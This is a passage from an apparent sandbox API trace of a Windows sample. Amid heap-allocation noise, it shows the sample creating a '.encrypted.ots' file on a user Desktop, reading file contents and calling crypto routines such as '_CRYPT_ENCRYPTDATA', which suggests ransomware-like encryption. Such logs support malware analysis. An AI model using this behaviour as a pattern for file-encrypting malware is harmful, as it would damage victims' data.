RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.098] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.encrypted.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzgmnb4vwunbbj9.encrypted.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.101] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.101] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.103] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x2987, lpOverlapped=0x0) returned 1 [0032.103] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12987) returned 0x945010 [0032.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12987) returned 0x9579a0 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12987) returned 0x945010 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.107] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12987) returned 0x945010 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12987) returned 0x96a330 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.109] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.110] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.110] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 